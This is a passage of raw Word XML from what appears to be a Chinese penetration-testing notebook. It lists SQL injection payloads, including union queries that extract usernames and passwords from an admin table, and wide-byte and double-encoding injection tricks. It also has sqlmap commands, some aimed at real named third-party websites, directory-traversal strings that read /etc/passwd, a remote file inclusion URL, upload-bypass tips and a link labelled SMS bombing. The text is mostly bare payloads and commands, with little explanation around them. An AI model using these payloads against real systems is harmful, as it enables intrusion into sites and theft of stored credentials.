      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B36FD" w:rsidRPr="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD"/>
    <w:p w:rsidR="003C3D8B" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:pPr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字符型注入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:t>在数据库中一般语句类似于：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">select *或字段 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>menber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like ‘%字符或字段%’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4"/>
    <w:p w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入语句%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00850C93">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850C93" w:rsidRDefault="00850C93" w:rsidP="00CA2DA4"/>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w: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=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server</w:t>
      </w:r>
    </w:p>
    <w:p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Order by 4  判断字段数  --------字段数为4</w:t>
      </w:r>
    </w:p>
    <w:p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（注意：此处我测试两次，第一次可以正常显示，第二次未正常测出字段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数此时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可以用如下语法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正常--------字段数为四）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'1','2','3','4'      查看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显示位--------显示位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为2和3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chema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schemat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 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数据库名称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table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schem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'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表名  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'),1)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字段     三个：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id  username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  password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRPr="006F7A6B" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id=2 and 1=2 union all select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">select top 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>col_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>object_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('manage'),</w:t>
      </w:r>
      <w:r w:rsidRPr="00E605F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), '3',4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出三个表名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRPr="00E605F2" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E605F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Id    username    password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>?id=-2 union all select '1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>',username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,password,'4' from manage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRPr="00E605F2" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921670" w:rsidRPr="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48E960E1" wp14:editId="3C368236">
            <wp:extent cx="5274310" cy="1942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08" w:rsidRPr="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF99F12">
            <wp:extent cx="4400550" cy="3228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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FECEF62">
            <wp:extent cx="5274310" cy="301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70" w:rsidRDefault="00921670" w:rsidP="00164D08"/>
    <w:p w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二次编码注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="577FAB3E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70" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urldecode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）编码变成%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921670" w:rsidRPr="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%2527</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t xml:space="preserve">--threads 10 //如果你玩过 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">的话会对这个很熟悉 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>线程最高设置为10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>--level 3 //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>头的值。最高可到5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>--risk 3 // 执行测试的风险（0-3，默认为1）risk越高，越</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>慢但是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>越安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>----search //后面跟参数 -D -T -C 搜索列（S），表（S）和</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>数据库名称（S） 如果你脑子够聪明，应该知道库列表名中可能会有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctf,flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>等字样，结果有时候题目就是这么耿直对吧？</w:t>
      </w:r>
    </w:p>
    <w:p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sqlmap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 xml:space="preserve"> -u "http://chinalover.sinaapp.com/SQL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0A449A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GBK/</w:t>
      </w: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index.php?id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>=1%df%27" --search -C flag</w:t>
      </w:r>
    </w:p>
    <w:p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9A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--level 3 --risk 1 --thread 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve"> http://www.yr17.net/productview.php?productid=3059</w:t>
      </w:r>
      <w:r>
        <w:t>" --batch -v 3 --tamper "unmagicquotes.py" –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dbs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proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节绕过注入）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t>http://www.yr17.net/productview.php?productid=3059  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve">tamper </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t>unmagicquotes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128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E2DBFB6" wp14:editId="0C2057CD">
            <wp:extent cx="5274310" cy="2815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28" w:rsidRDefault="00972178" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t xml:space="preserve">sqlmap.py -u </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-8/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --technique B --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A14128">
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A14128">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --batch -v 0</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:br/>
        <w:t>或者：</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:br/>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>python sqlmap.py -u "</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-8/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A14128">
        <w:t>" --technique B --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A14128">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --batch</w:t>
      </w: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/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Pr="00CD3AF6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pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信轰炸技巧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00972178" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidR="00A14128" w:rsidRPr="00B01FDE">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
          </w:rPr>
          <w:t>https://www.anquanke.com/post/id/93878</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="002D5237" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="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167AE2" wp14:editId="26F47BD1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-161567</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>978038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1901190"/>
            <wp:effectExtent l="0" t="0" r="254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99F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务器</w:t>
      </w:r>
      <w:r w:rsidR="0039199F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972178" w:rsidRPr="00972178" w:rsidRDefault="00972178" w:rsidP="00972178">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRPr="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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21431F3" wp14:editId="1BCD164A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5162550" cy="30670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B27675" wp14:editId="61CCEEF0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-111760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3965133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2856865"/>
            <wp:effectExtent l="0" t="0" r="2540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99F" w:rsidRDefault="0039199F" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD3AF6" w:rsidRDefault="00CD3AF6" w:rsidP="000A449A"/>
    <w:p w:rsidR="008F3489" w:rsidRDefault="008F3489" w:rsidP="008F3489">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>后台登录的逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F3489" w:rsidRPr="008F3489" w:rsidRDefault="008F3489" w:rsidP="008F3489">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3489">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=48686&amp;highlight=%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F3489" w:rsidRDefault="008F3489" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7087" w:rsidRDefault="00FA7087" w:rsidP="00FA7087">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA7087" w:rsidRDefault="00972178" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00126765" w:rsidRPr="00971B05">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/thread-54849-1-1.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00702405" w:rsidRPr="00702405" w:rsidRDefault="00972178" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.51cto.com/wt7315/1863177</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00126765" w:rsidRDefault="00972178" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.k0rz3n.com/2018/11/20/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8B%20PHP%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几种经典的测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=../../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?page=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?home=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>main.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?page=http://www.a.com/1.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w:rsidR="00982F28" w:rsidRDefault="00972178" w:rsidP="00982F28">
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidR="00982F28" w:rsidRPr="00335348">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://1.1.1.1/../../../../dir/file.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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%00嵌入任意位置</w:t>
      </w:r>
    </w:p>
    <w:p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.的利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00982F28" w:rsidRPr="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>文件上传绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367951" w:rsidRPr="00367951" w:rsidRDefault="00972178" w:rsidP="00367951">
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidR="00367951" w:rsidRPr="00076615">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/188464.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00367951">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00367951">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传fuzzy构造</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00702405" w:rsidRPr="00702405" w:rsidRDefault="00972178" w:rsidP="00702405">
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.51cto.com/wt7315/1865580</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>.文件名大小写绕过：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pHp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AsP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103"/>
